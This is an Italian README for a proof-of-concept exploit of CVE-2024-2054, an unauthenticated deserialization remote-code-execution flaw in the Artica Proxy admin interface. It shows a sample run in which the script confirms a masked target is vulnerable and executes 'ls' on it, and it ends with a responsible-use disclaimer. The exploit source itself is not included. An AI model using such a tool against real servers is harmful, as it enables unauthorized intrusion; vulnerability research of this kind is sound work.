
Exploit proof-of-concept per CVE-2024-2054, che dimostra la deserializzazione non sicura RCE nell'applicazione web amministrativa Artica-Proxy. Include esecuzione di comandi e verifica della vulnerabilità.
Un proof of concept di exploit per l'applicazione web amministrativa ARTICA PROXY CVE-2024-2054
Maggiori dettagli qui: https://blog.sonicwall.com/en-us/2024/03/unpatched-php-deserialization-vulnerability-in-artica-proxy/
$ python3 CVE-2024-2054.py
Enter url: https://8X.XX.XX.X4:9000
Vulnerable
enter command: ls
assets
index.html
wiz.upload.php
wiz.wizard.php
wiz.wizard.progress.php
Questa POC è stata creata esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è intesa ad attaccare sistemi se non esplicitamente autorizzati. I creatori/mantenitori del progetto non sono responsabili dell'uso improprio del software/POC. Usare in modo responsabile.